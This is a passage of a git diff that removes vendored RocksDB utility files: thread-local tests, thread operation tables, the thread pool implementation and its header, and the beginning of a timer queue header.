-      env_->StartThread(func1, static_cast<void*>(&p));
-    }
-
-    env_->WaitForJoin();
-
-    // N threads x 2 ThreadLocal instance cleanup on thread exit
-    ASSERT_EQ(unref_count, 2 * p.total);
-  }
-
-  // Case 2: unref triggered by ThreadLocal instance destruction
-  auto func2 = [](void* ptr) {
-    auto& p = *static_cast<Params*>(ptr);
-
-    p.mu->Lock();
-    ++(p.started);
-    p.cv->SignalAll();
-    while (p.started != p.total) {
-      p.cv->Wait();
-    }
-    p.mu->Unlock();
-
-    ASSERT_TRUE(p.tls1.Get() == nullptr);
-    ASSERT_TRUE(p.tls2->Get() == nullptr);
-
-    p.tls1.Reset(ptr);
-    p.tls2->Reset(ptr);
-
-    p.tls1.Reset(ptr);
-    p.tls2->Reset(ptr);
-
-    p.mu->Lock();
-    ++(p.completed);
-    p.cv->SignalAll();
-
-    // Waiting for instruction to exit thread
-    while (p.completed != 0) {
-      p.cv->Wait();
-    }
-    p.mu->Unlock();
-  };
-
-  for (int th = 1; th <= 128; th += th) {
-    port::Mutex mu;
-    port::CondVar cv(&mu);
-    int unref_count = 0;
-    Params p(&mu, &cv, &unref_count, th, unref);
-    p.tls2 = new ThreadLocalPtr(unref);
-
-    for (int i = 0; i < p.total; ++i) {
-      env_->StartThread(func2, static_cast<void*>(&p));
-    }
-
-    // Wait for all threads to finish using Params
-    mu.Lock();
-    while (p.completed != p.total) {
-      cv.Wait();
-    }
-    mu.Unlock();
-
-    // Now destroy one ThreadLocal instance
-    delete p.tls2;
-    p.tls2 = nullptr;
-    // instance destroy for N threads
-    ASSERT_EQ(unref_count, p.total);
-
-    // Signal to exit
-    mu.Lock();
-    p.completed = 0;
-    cv.SignalAll();
-    mu.Unlock();
-    env_->WaitForJoin();
-    // additional N threads exit unref for the left instance
-    ASSERT_EQ(unref_count, 2 * p.total);
-  }
-}
-
-TEST_F(ThreadLocalTest, Swap) {
-  ThreadLocalPtr tls;
-  tls.Reset(reinterpret_cast<void*>(1));
-  ASSERT_EQ(reinterpret_cast<int64_t>(tls.Swap(nullptr)), 1);
-  ASSERT_TRUE(tls.Swap(reinterpret_cast<void*>(2)) == nullptr);
-  ASSERT_EQ(reinterpret_cast<int64_t>(tls.Get()), 2);
-  ASSERT_EQ(reinterpret_cast<int64_t>(tls.Swap(reinterpret_cast<void*>(3))), 2);
-}
-
-TEST_F(ThreadLocalTest, Scrape) {
-  auto unref = [](void* ptr) {
-    auto& p = *static_cast<Params*>(ptr);
-    p.mu->Lock();
-    ++(*p.unref);
-    p.mu->Unlock();
-  };
-
-  auto func = [](void* ptr) {
-    auto& p = *static_cast<Params*>(ptr);
-
-    ASSERT_TRUE(p.tls1.Get() == nullptr);
-    ASSERT_TRUE(p.tls2->Get() == nullptr);
-
-    p.tls1.Reset(ptr);
-    p.tls2->Reset(ptr);
-
-    p.tls1.Reset(ptr);
-    p.tls2->Reset(ptr);
-
-    p.mu->Lock();
-    ++(p.completed);
-    p.cv->SignalAll();
-
-    // Waiting for instruction to exit thread
-    while (p.completed != 0) {
-      p.cv->Wait();
-    }
-    p.mu->Unlock();
-  };
-
-  for (int th = 1; th <= 128; th += th) {
-    port::Mutex mu;
-    port::CondVar cv(&mu);
-    int unref_count = 0;
-    Params p(&mu, &cv, &unref_count, th, unref);
-    p.tls2 = new ThreadLocalPtr(unref);
-
-    for (int i = 0; i < p.total; ++i) {
-      env_->StartThread(func, static_cast<void*>(&p));
-    }
-
-    // Wait for all threads to finish using Params
-    mu.Lock();
-    while (p.completed != p.total) {
-      cv.Wait();
-    }
-    mu.Unlock();
-
-    ASSERT_EQ(unref_count, 0);
-
-    // Scrape all thread local data. No unref at thread
-    // exit or ThreadLocalPtr destruction
-    autovector<void*> ptrs;
-    p.tls1.Scrape(&ptrs, nullptr);
-    p.tls2->Scrape(&ptrs, nullptr);
-    delete p.tls2;
-    // Signal to exit
-    mu.Lock();
-    p.completed = 0;
-    cv.SignalAll();
-    mu.Unlock();
-    env_->WaitForJoin();
-
-    ASSERT_EQ(unref_count, 0);
-  }
-}
-
-TEST_F(ThreadLocalTest, Fold) {
-  auto unref = [](void* ptr) {
-    delete static_cast<std::atomic<int64_t>*>(ptr);
-  };
-  static const int kNumThreads = 16;
-  static const int kItersPerThread = 10;
-  port::Mutex mu;
-  port::CondVar cv(&mu);
-  Params params(&mu, &cv, nullptr, kNumThreads, unref);
-  auto func = [](void* ptr) {
-    auto& p = *static_cast<Params*>(ptr);
-    ASSERT_TRUE(p.tls1.Get() == nullptr);
-    p.tls1.Reset(new std::atomic<int64_t>(0));
-
-    for (int i = 0; i < kItersPerThread; ++i) {
-      static_cast<std::atomic<int64_t>*>(p.tls1.Get())->fetch_add(1);
-    }
-
-    p.mu->Lock();
-    ++(p.completed);
-    p.cv->SignalAll();
-
-    // Waiting for instruction to exit thread
-    while (p.completed != 0) {
-      p.cv->Wait();
-    }
-    p.mu->Unlock();
-  };
-
-  for (int th = 0; th < params.total; ++th) {
-    env_->StartThread(func, static_cast<void*>(&params));
-  }
-
-  // Wait for all threads to finish using Params
-  mu.Lock();
-  while (params.completed != params.total) {
-    cv.Wait();
-  }
-  mu.Unlock();
-
-  // Verify Fold() behavior
-  int64_t sum = 0;
-  params.tls1.Fold(
-      [](void* ptr, void* res) {
-        auto sum_ptr = static_cast<int64_t*>(res);
-        *sum_ptr += static_cast<std::atomic<int64_t>*>(ptr)->load();
-      },
-      &sum);
-  ASSERT_EQ(sum, kNumThreads * kItersPerThread);
-
-  // Signal to exit
-  mu.Lock();
-  params.completed = 0;
-  cv.SignalAll();
-  mu.Unlock();
-  env_->WaitForJoin();
-}
-
-TEST_F(ThreadLocalTest, CompareAndSwap) {
-  ThreadLocalPtr tls;
-  ASSERT_TRUE(tls.Swap(reinterpret_cast<void*>(1)) == nullptr);
-  void* expected = reinterpret_cast<void*>(1);
-  // Swap in 2
-  ASSERT_TRUE(tls.CompareAndSwap(reinterpret_cast<void*>(2), expected));
-  expected = reinterpret_cast<void*>(100);
-  // Fail Swap, still 2
-  ASSERT_TRUE(!tls.CompareAndSwap(reinterpret_cast<void*>(2), expected));
-  ASSERT_EQ(expected, reinterpret_cast<void*>(2));
-  // Swap in 3
-  expected = reinterpret_cast<void*>(2);
-  ASSERT_TRUE(tls.CompareAndSwap(reinterpret_cast<void*>(3), expected));
-  ASSERT_EQ(tls.Get(), reinterpret_cast<void*>(3));
-}
-
-namespace {
-
-void* AccessThreadLocal(void* arg) {
-  TEST_SYNC_POINT("AccessThreadLocal:Start");
-  ThreadLocalPtr tlp;
-  tlp.Reset(new std::string("hello RocksDB"));
-  TEST_SYNC_POINT("AccessThreadLocal:End");
-  return nullptr;
-}
-
-}  // namespace
-
-// The following test is disabled as it requires manual steps to run it
-// correctly.
-//
-// Currently we have no way to acess SyncPoint w/o ASAN error when the
-// child thread dies after the main thread dies.  So if you manually enable
-// this test and only see an ASAN error on SyncPoint, it means you pass the
-// test.
-TEST_F(ThreadLocalTest, DISABLED_MainThreadDiesFirst) {
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"AccessThreadLocal:Start", "MainThreadDiesFirst:End"},
-       {"PosixEnv::~PosixEnv():End", "AccessThreadLocal:End"}});
-
-  // Triggers the initialization of singletons.
-  Env::Default();
-
-#ifndef ROCKSDB_LITE
-  try {
-#endif  // ROCKSDB_LITE
-    rocksdb::port::Thread th(&AccessThreadLocal, nullptr);
-    th.detach();
-    TEST_SYNC_POINT("MainThreadDiesFirst:End");
-#ifndef ROCKSDB_LITE
-  } catch (const std::system_error& ex) {
-    std::cerr << "Start thread: " << ex.code() << std::endl;
-    FAIL();
-  }
-#endif  // ROCKSDB_LITE
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/util/thread_operation.h b/thirdparty/rocksdb/util/thread_operation.h
deleted file mode 100644
index 025392b..0000000
--- a/thirdparty/rocksdb/util/thread_operation.h
+++ /dev/null
@@ -1,121 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file defines the structures for thread operation and state.
-// Thread operations are used to describe high level action of a
-// thread such as doing compaction or flush, while thread state
-// are used to describe lower-level action such as reading /
-// writing a file or waiting for a mutex.  Operations and states
-// are designed to be independent.  Typically, a thread usually involves
-// in one operation and one state at any specific point in time.
-
-#pragma once
-
-#include "rocksdb/thread_status.h"
-
-#include <string>
-
-namespace rocksdb {
-
-#ifdef ROCKSDB_USING_THREAD_STATUS
-
-// The structure that describes a major thread operation.
-struct OperationInfo {
-  const ThreadStatus::OperationType type;
-  const std::string name;
-};
-
-// The global operation table.
-//
-// When updating a status of a thread, the pointer of the OperationInfo
-// of the current ThreadStatusData will be pointing to one of the
-// rows in this global table.
-//
-// Note that it's not designed to be constant as in the future we
-// might consider adding global count to the OperationInfo.
-static OperationInfo global_operation_table[] = {
-  {ThreadStatus::OP_UNKNOWN, ""},
-  {ThreadStatus::OP_COMPACTION, "Compaction"},
-  {ThreadStatus::OP_FLUSH, "Flush"}
-};
-
-struct OperationStageInfo {
-  const ThreadStatus::OperationStage stage;
-  const std::string name;
-};
-
-// A table maintains the mapping from stage type to stage string.
-// Note that the string must be changed accordingly when the
-// associated function name changed.
-static OperationStageInfo global_op_stage_table[] = {
-  {ThreadStatus::STAGE_UNKNOWN, ""},
-  {ThreadStatus::STAGE_FLUSH_RUN,
-      "FlushJob::Run"},
-  {ThreadStatus::STAGE_FLUSH_WRITE_L0,
-      "FlushJob::WriteLevel0Table"},
-  {ThreadStatus::STAGE_COMPACTION_PREPARE,
-      "CompactionJob::Prepare"},
-  {ThreadStatus::STAGE_COMPACTION_RUN,
-      "CompactionJob::Run"},
-  {ThreadStatus::STAGE_COMPACTION_PROCESS_KV,
-      "CompactionJob::ProcessKeyValueCompaction"},
-  {ThreadStatus::STAGE_COMPACTION_INSTALL,
-      "CompactionJob::Install"},
-  {ThreadStatus::STAGE_COMPACTION_SYNC_FILE,
-      "CompactionJob::FinishCompactionOutputFile"},
-  {ThreadStatus::STAGE_PICK_MEMTABLES_TO_FLUSH,
-      "MemTableList::PickMemtablesToFlush"},
-  {ThreadStatus::STAGE_MEMTABLE_ROLLBACK,
-      "MemTableList::RollbackMemtableFlush"},
-  {ThreadStatus::STAGE_MEMTABLE_INSTALL_FLUSH_RESULTS,
-      "MemTableList::InstallMemtableFlushResults"},
-};
-
-// The structure that describes a state.
-struct StateInfo {
-  const ThreadStatus::StateType type;
-  const std::string name;
-};
-
-// The global state table.
-//
-// When updating a status of a thread, the pointer of the StateInfo
-// of the current ThreadStatusData will be pointing to one of the
-// rows in this global table.
-static StateInfo global_state_table[] = {
-  {ThreadStatus::STATE_UNKNOWN, ""},
-  {ThreadStatus::STATE_MUTEX_WAIT, "Mutex Wait"},
-};
-
-struct OperationProperty {
-  int code;
-  std::string name;
-};
-
-static OperationProperty compaction_operation_properties[] = {
-  {ThreadStatus::COMPACTION_JOB_ID, "JobID"},
-  {ThreadStatus::COMPACTION_INPUT_OUTPUT_LEVEL, "InputOutputLevel"},
-  {ThreadStatus::COMPACTION_PROP_FLAGS, "Manual/Deletion/Trivial"},
-  {ThreadStatus::COMPACTION_TOTAL_INPUT_BYTES, "TotalInputBytes"},
-  {ThreadStatus::COMPACTION_BYTES_READ, "BytesRead"},
-  {ThreadStatus::COMPACTION_BYTES_WRITTEN, "BytesWritten"},
-};
-
-static OperationProperty flush_operation_properties[] = {
-  {ThreadStatus::FLUSH_JOB_ID, "JobID"},
-  {ThreadStatus::FLUSH_BYTES_MEMTABLES, "BytesMemtables"},
-  {ThreadStatus::FLUSH_BYTES_WRITTEN, "BytesWritten"}
-};
-
-#else
-
-struct OperationInfo {
-};
-
-struct StateInfo {
-};
-
-#endif  // ROCKSDB_USING_THREAD_STATUS
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/threadpool_imp.cc b/thirdparty/rocksdb/util/threadpool_imp.cc
deleted file mode 100644
index f38e642..0000000
--- a/thirdparty/rocksdb/util/threadpool_imp.cc
+++ /dev/null
@@ -1,460 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "util/threadpool_imp.h"
-
-#include "monitoring/thread_status_util.h"
-#include "port/port.h"
-
-#ifndef OS_WIN
-#  include <unistd.h>
-#endif
-
-#ifdef OS_LINUX
-#  include <sys/syscall.h>
-#endif
-
-#include <algorithm>
-#include <atomic>
-#include <condition_variable>
-#include <mutex>
-#include <stdlib.h>
-#include <thread>
-#include <vector>
-
-namespace rocksdb {
-
-void ThreadPoolImpl::PthreadCall(const char* label, int result) {
-  if (result != 0) {
-    fprintf(stderr, "pthread %s: %s\n", label, strerror(result));
-    abort();
-  }
-}
-
-struct ThreadPoolImpl::Impl {
-
-  Impl();
-  ~Impl();
-
-  void JoinThreads(bool wait_for_jobs_to_complete);
-
-  void SetBackgroundThreadsInternal(int num, bool allow_reduce);
-  int GetBackgroundThreads();
-
-  unsigned int GetQueueLen() const {
-    return queue_len_.load(std::memory_order_relaxed);
-  }
-
-  void LowerIOPriority();
-
-  void WakeUpAllThreads() {
-    bgsignal_.notify_all();
-  }
-
-  void BGThread(size_t thread_id);
-
-  void StartBGThreads();
-
-  void Submit(std::function<void()>&& schedule,
-    std::function<void()>&& unschedule, void* tag);
-
-  int UnSchedule(void* arg);
-
-  void SetHostEnv(Env* env) { env_ = env; }
-
-  Env* GetHostEnv() const { return env_; }
-
-  bool HasExcessiveThread() const {
-    return static_cast<int>(bgthreads_.size()) > total_threads_limit_;
-  }
-
-  // Return true iff the current thread is the excessive thread to terminate.
-  // Always terminate the running thread that is added last, even if there are
-  // more than one thread to terminate.
-  bool IsLastExcessiveThread(size_t thread_id) const {
-    return HasExcessiveThread() && thread_id == bgthreads_.size() - 1;
-  }
-
-  bool IsExcessiveThread(size_t thread_id) const {
-    return static_cast<int>(thread_id) >= total_threads_limit_;
-  }
-
-  // Return the thread priority.
-  // This would allow its member-thread to know its priority.
-  Env::Priority GetThreadPriority() const { return priority_; }
-
-  // Set the thread priority.
-  void SetThreadPriority(Env::Priority priority) { priority_ = priority; }
-
-private:
-
-  static void* BGThreadWrapper(void* arg);
-
-  bool low_io_priority_;
-  Env::Priority priority_;
-  Env*         env_;
-
-  int total_threads_limit_;
-  std::atomic_uint queue_len_;  // Queue length. Used for stats reporting
-  bool exit_all_threads_;
-  bool wait_for_jobs_to_complete_;
-
-  // Entry per Schedule()/Submit() call
-  struct BGItem {
-    void* tag = nullptr;
-    std::function<void()> function;
-    std::function<void()> unschedFunction;
-  };
-
-  using BGQueue = std::deque<BGItem>;
-  BGQueue       queue_;
-
-  std::mutex               mu_;
-  std::condition_variable  bgsignal_;
-  std::vector<port::Thread> bgthreads_;
-};
-
-
-inline
-ThreadPoolImpl::Impl::Impl()
-    :
-      low_io_priority_(false),
-      priority_(Env::LOW),
-      env_(nullptr),
-      total_threads_limit_(0),
-      queue_len_(),
-      exit_all_threads_(false),
-      wait_for_jobs_to_complete_(false),
-      queue_(),
-      mu_(),
-      bgsignal_(),
-      bgthreads_() {
-}
-
-inline
-ThreadPoolImpl::Impl::~Impl() { assert(bgthreads_.size() == 0U); }
-
-void ThreadPoolImpl::Impl::JoinThreads(bool wait_for_jobs_to_complete) {
-
-  std::unique_lock<std::mutex> lock(mu_);
-  assert(!exit_all_threads_);
-
-  wait_for_jobs_to_complete_ = wait_for_jobs_to_complete;
-  exit_all_threads_ = true;
-
-  lock.unlock();
-
-  bgsignal_.notify_all();
-
-  for (auto& th : bgthreads_) {
-    th.join();
-  }
-
-  bgthreads_.clear();
-
-  exit_all_threads_ = false;
-  wait_for_jobs_to_complete_ = false;
-}
-
-inline
-void ThreadPoolImpl::Impl::LowerIOPriority() {
-  std::lock_guard<std::mutex> lock(mu_);
-  low_io_priority_ = true;
-}
-
-
-void ThreadPoolImpl::Impl::BGThread(size_t thread_id) {
-  bool low_io_priority = false;
-  while (true) {
-// Wait until there is an item that is ready to run
-    std::unique_lock<std::mutex> lock(mu_);
-    // Stop waiting if the thread needs to do work or needs to terminate.
-    while (!exit_all_threads_ && !IsLastExcessiveThread(thread_id) &&
-           (queue_.empty() || IsExcessiveThread(thread_id))) {
-      bgsignal_.wait(lock);
-    }
-
-    if (exit_all_threads_) {  // mechanism to let BG threads exit safely
-
-      if(!wait_for_jobs_to_complete_ ||
-          queue_.empty()) {
-        break;
-       }
-    }
-
-    if (IsLastExcessiveThread(thread_id)) {
-      // Current thread is the last generated one and is excessive.
-      // We always terminate excessive thread in the reverse order of
-      // generation time.
-      auto& terminating_thread = bgthreads_.back();
-      terminating_thread.detach();
-      bgthreads_.pop_back();
-
-      if (HasExcessiveThread()) {
-        // There is still at least more excessive thread to terminate.
-        WakeUpAllThreads();
-      }
-      break;
-    }
-
-    auto func = std::move(queue_.front().function);
-    queue_.pop_front();
-
-    queue_len_.store(static_cast<unsigned int>(queue_.size()),
-                     std::memory_order_relaxed);
-
-    bool decrease_io_priority = (low_io_priority != low_io_priority_);
-    lock.unlock();
-
-#ifdef OS_LINUX
-    if (decrease_io_priority) {
-#define IOPRIO_CLASS_SHIFT (13)
-#define IOPRIO_PRIO_VALUE(class, data) (((class) << IOPRIO_CLASS_SHIFT) | data)
-      // Put schedule into IOPRIO_CLASS_IDLE class (lowest)
-      // These system calls only have an effect when used in conjunction
-      // with an I/O scheduler that supports I/O priorities. As at
-      // kernel 2.6.17 the only such scheduler is the Completely
-      // Fair Queuing (CFQ) I/O scheduler.
-      // To change scheduler:
-      //  echo cfq > /sys/block/<device_name>/queue/schedule
-      // Tunables to consider:
-      //  /sys/block/<device_name>/queue/slice_idle
-      //  /sys/block/<device_name>/queue/slice_sync
-      syscall(SYS_ioprio_set, 1,  // IOPRIO_WHO_PROCESS
-              0,                  // current thread
-              IOPRIO_PRIO_VALUE(3, 0));
-      low_io_priority = true;
-    }
-#else
-    (void)decrease_io_priority;  // avoid 'unused variable' error
-#endif
-    func();
-  }
-}
-
-// Helper struct for passing arguments when creating threads.
-struct BGThreadMetadata {
-  ThreadPoolImpl::Impl* thread_pool_;
-  size_t thread_id_;  // Thread count in the thread.
-  BGThreadMetadata(ThreadPoolImpl::Impl* thread_pool, size_t thread_id)
-      : thread_pool_(thread_pool), thread_id_(thread_id) {}
-};
-
-void* ThreadPoolImpl::Impl::BGThreadWrapper(void* arg) {
-  BGThreadMetadata* meta = reinterpret_cast<BGThreadMetadata*>(arg);
-  size_t thread_id = meta->thread_id_;
-  ThreadPoolImpl::Impl* tp = meta->thread_pool_;
-#ifdef ROCKSDB_USING_THREAD_STATUS
-  // for thread-status
-  ThreadStatusUtil::RegisterThread(
-      tp->GetHostEnv(), (tp->GetThreadPriority() == Env::Priority::HIGH
-                             ? ThreadStatus::HIGH_PRIORITY
-                             : ThreadStatus::LOW_PRIORITY));
-#endif
-  delete meta;
-  tp->BGThread(thread_id);
-#ifdef ROCKSDB_USING_THREAD_STATUS
-  ThreadStatusUtil::UnregisterThread();
-#endif
-  return nullptr;
-}
-
-void ThreadPoolImpl::Impl::SetBackgroundThreadsInternal(int num,
-  bool allow_reduce) {
-  std::unique_lock<std::mutex> lock(mu_);
-  if (exit_all_threads_) {
-    lock.unlock();
-    return;
-  }
-  if (num > total_threads_limit_ ||
-      (num < total_threads_limit_ && allow_reduce)) {
-    total_threads_limit_ = std::max(0, num);
-    WakeUpAllThreads();
-    StartBGThreads();
-  }
-}
-
-int ThreadPoolImpl::Impl::GetBackgroundThreads() {
-  std::unique_lock<std::mutex> lock(mu_);
-  return total_threads_limit_;
-}
-
-void ThreadPoolImpl::Impl::StartBGThreads() {
-  // Start background thread if necessary
-  while ((int)bgthreads_.size() < total_threads_limit_) {
-
-    port::Thread p_t(&BGThreadWrapper,
-      new BGThreadMetadata(this, bgthreads_.size()));
-
-// Set the thread name to aid debugging
-#if defined(_GNU_SOURCE) && defined(__GLIBC_PREREQ)
-#if __GLIBC_PREREQ(2, 12)
-    auto th_handle = p_t.native_handle();
-    char name_buf[16];
-    snprintf(name_buf, sizeof name_buf, "rocksdb:bg%" ROCKSDB_PRIszt,
-             bgthreads_.size());
-    name_buf[sizeof name_buf - 1] = '\0';
-    pthread_setname_np(th_handle, name_buf);
-#endif
-#endif
-    bgthreads_.push_back(std::move(p_t));
-  }
-}
-
-void ThreadPoolImpl::Impl::Submit(std::function<void()>&& schedule,
-  std::function<void()>&& unschedule, void* tag) {
-
-  std::lock_guard<std::mutex> lock(mu_);
-
-  if (exit_all_threads_) {
-    return;
-  }
-
-  StartBGThreads();
-
-  // Add to priority queue
-  queue_.push_back(BGItem());
-
-  auto& item = queue_.back();
-  item.tag = tag;
-  item.function = std::move(schedule);
-  item.unschedFunction = std::move(unschedule);
-
-  queue_len_.store(static_cast<unsigned int>(queue_.size()),
-    std::memory_order_relaxed);
-
-  if (!HasExcessiveThread()) {
-    // Wake up at least one waiting thread.
-    bgsignal_.notify_one();
-  } else {
-    // Need to wake up all threads to make sure the one woken
-    // up is not the one to terminate.
-    WakeUpAllThreads();
-  }
-}
-
-int ThreadPoolImpl::Impl::UnSchedule(void* arg) {
-  int count = 0;
-
-  std::vector<std::function<void()>> candidates;
-  {
-    std::lock_guard<std::mutex> lock(mu_);
-
-    // Remove from priority queue
-    BGQueue::iterator it = queue_.begin();
-    while (it != queue_.end()) {
-      if (arg == (*it).tag) {
-        if (it->unschedFunction) {
-          candidates.push_back(std::move(it->unschedFunction));
-        }
-        it = queue_.erase(it);
-        count++;
-      } else {
-        ++it;
-      }
-    }
-    queue_len_.store(static_cast<unsigned int>(queue_.size()),
-      std::memory_order_relaxed);
-  }
-
-
- // Run unschedule functions outside the mutex
-  for (auto& f : candidates) {
-    f();
-  }
-
-  return count;
-}
-
-ThreadPoolImpl::ThreadPoolImpl() :
-  impl_(new Impl()) {
-}
-
-
-ThreadPoolImpl::~ThreadPoolImpl() {
-}
-
-void ThreadPoolImpl::JoinAllThreads() {
-  impl_->JoinThreads(false);
-}
-
-void ThreadPoolImpl::SetBackgroundThreads(int num) {
-  impl_->SetBackgroundThreadsInternal(num, true);
-}
-
-int ThreadPoolImpl::GetBackgroundThreads() {
-  return impl_->GetBackgroundThreads();
-}
-
-unsigned int ThreadPoolImpl::GetQueueLen() const {
-  return impl_->GetQueueLen();
-}
-
-void ThreadPoolImpl::WaitForJobsAndJoinAllThreads() {
-  impl_->JoinThreads(true);
-}
-
-void ThreadPoolImpl::LowerIOPriority() {
-  impl_->LowerIOPriority();
-}
-
-void ThreadPoolImpl::IncBackgroundThreadsIfNeeded(int num) {
-  impl_->SetBackgroundThreadsInternal(num, false);
-}
-
-void ThreadPoolImpl::SubmitJob(const std::function<void()>& job) {
-  auto copy(job);
-  impl_->Submit(std::move(copy), std::function<void()>(), nullptr);
-}
-
-
-void ThreadPoolImpl::SubmitJob(std::function<void()>&& job) {
-  impl_->Submit(std::move(job), std::function<void()>(), nullptr);
-}
-
-void ThreadPoolImpl::Schedule(void(*function)(void* arg1), void* arg,
-  void* tag, void(*unschedFunction)(void* arg)) {
-
-  std::function<void()> fn = [arg, function] { function(arg); };
-
-  std::function<void()> unfn;
-  if (unschedFunction != nullptr) {
-    auto uf = [arg, unschedFunction] { unschedFunction(arg); };
-    unfn = std::move(uf);
-  }
-
-  impl_->Submit(std::move(fn), std::move(unfn), tag);
-}
-
-int ThreadPoolImpl::UnSchedule(void* arg) {
-  return impl_->UnSchedule(arg);
-}
-
-void ThreadPoolImpl::SetHostEnv(Env* env) { impl_->SetHostEnv(env); }
-
-Env* ThreadPoolImpl::GetHostEnv() const { return impl_->GetHostEnv(); }
-
-// Return the thread priority.
-// This would allow its member-thread to know its priority.
-Env::Priority ThreadPoolImpl::GetThreadPriority() const {
-  return impl_->GetThreadPriority();
-}
-
-// Set the thread priority.
-void ThreadPoolImpl::SetThreadPriority(Env::Priority priority) {
-  impl_->SetThreadPriority(priority);
-}
-
-ThreadPool* NewThreadPool(int num_threads) {
-  ThreadPoolImpl* thread_pool = new ThreadPoolImpl();
-  thread_pool->SetBackgroundThreads(num_threads);
-  return thread_pool;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/threadpool_imp.h b/thirdparty/rocksdb/util/threadpool_imp.h
deleted file mode 100644
index cced19b..0000000
--- a/thirdparty/rocksdb/util/threadpool_imp.h
+++ /dev/null
@@ -1,109 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#pragma once
-
-#include "rocksdb/threadpool.h"
-#include "rocksdb/env.h"
-
-#include <memory>
-#include <functional>
-
-namespace rocksdb {
-
-
-class ThreadPoolImpl : public ThreadPool {
- public:
-  ThreadPoolImpl();
-  ~ThreadPoolImpl();
-
-  ThreadPoolImpl(ThreadPoolImpl&&) = delete;
-  ThreadPoolImpl& operator=(ThreadPoolImpl&&) = delete;
-
-  // Implement ThreadPool interfaces
-
-  // Wait for all threads to finish.
-  // Discards all the jobs that did not
-  // start executing and waits for those running
-  // to complete
-  void JoinAllThreads() override;
-
-  // Set the number of background threads that will be executing the
-  // scheduled jobs.
-  void SetBackgroundThreads(int num) override;
-  int GetBackgroundThreads() override;
-
-  // Get the number of jobs scheduled in the ThreadPool queue.
-  unsigned int GetQueueLen() const override;
-
-  // Waits for all jobs to complete those
-  // that already started running and those that did not
-  // start yet
-  void WaitForJobsAndJoinAllThreads() override;
-
-  // Make threads to run at a lower kernel priority
-  // Currently only has effect on Linux
-  void LowerIOPriority();
-
-  // Ensure there is at aleast num threads in the pool
-  // but do not kill threads if there are more
-  void IncBackgroundThreadsIfNeeded(int num);
-
-  // Submit a fire and forget job
-  // These jobs can not be unscheduled
-
-  // This allows to submit the same job multiple times
-  void SubmitJob(const std::function<void()>&) override;
-  // This moves the function in for efficiency
-  void SubmitJob(std::function<void()>&&) override;
-
-  // Schedule a job with an unschedule tag and unschedule function
-  // Can be used to filter and unschedule jobs by a tag
-  // that are still in the queue and did not start running
-  void Schedule(void (*function)(void* arg1), void* arg, void* tag,
-                void (*unschedFunction)(void* arg));
-
-  // Filter jobs that are still in a queue and match
-  // the given tag. Remove them from a queue if any
-  // and for each such job execute an unschedule function
-  // if such was given at scheduling time.
-  int UnSchedule(void* tag);
-
-  void SetHostEnv(Env* env);
-
-  Env* GetHostEnv() const;
-
-  // Return the thread priority.
-  // This would allow its member-thread to know its priority.
-  Env::Priority GetThreadPriority() const;
-
-  // Set the thread priority.
-  void SetThreadPriority(Env::Priority priority);
-
-  static void PthreadCall(const char* label, int result);
-
-  struct Impl;
-
- private:
-
-   // Current public virtual interface does not provide usable
-   // functionality and thus can not be used internally to
-   // facade different implementations.
-   //
-   // We propose a pimpl idiom in order to easily replace the thread pool impl
-   // w/o touching the header file but providing a different .cc potentially
-   // CMake option driven.
-   //
-   // Another option is to introduce a Env::MakeThreadPool() virtual interface
-   // and override the environment. This would require refactoring ThreadPool usage.
-   //
-   // We can also combine these two approaches
-   std::unique_ptr<Impl>   impl_;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/timer_queue.h b/thirdparty/rocksdb/util/timer_queue.h
deleted file mode 100644
index f068ffe..0000000
--- a/thirdparty/rocksdb/util/timer_queue.h
+++ /dev/null
@@ -1,220 +0,0 @@
-//  Portions Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Borrowed from
-// http://www.crazygaze.com/blog/2016/03/24/portable-c-timer-queue/
-// Timer Queue
-//
-// License
-//
-// The source code in this article is licensed under the CC0 license, so feel
-// free to copy, modify, share, do whatever you want with it.
-// No attribution is required, but Ill be happy if you do.
-// CC0 license
-
-// The person who associated a work with this deed has dedicated the work to the
-// public domain by waiving all of his or her rights to the work worldwide
-// under copyright law, including all related and neighboring rights, to the
-// extent allowed by law.  You can copy, modify, distribute and perform the
-// work, even for commercial purposes, all without asking permission.
-
-#pragma once
-
-#include "port/port.h"
-
-#include <assert.h>
-#include <chrono>
-#include <condition_variable>
-#include <functional>
-#include <queue>
-#include <thread>
-#include <utility>
-#include <vector>
-
-// Allows execution of handlers at a specified time in the future
-// Guarantees:
-//  - All handlers are executed ONCE, even if cancelled (aborted parameter will
-// be set to true)
-//      - If TimerQueue is destroyed, it will cancel all handlers.
-//  - Handlers are ALWAYS executed in the Timer Queue worker thread.
-//  - Handlers execution order is NOT guaranteed
-//
-////////////////////////////////////////////////////////////////////////////////
-// borrowed from
-// http://www.crazygaze.com/blog/2016/03/24/portable-c-timer-queue/
-class TimerQueue {
- public:
-  TimerQueue() : m_th(&TimerQueue::run, this) {}
-
-  ~TimerQueue() {
-    cancelAll();
-    // Abusing the timer queue to trigger the shutdown.
-    add(0, [this](bool) {
-      m_finish = true;
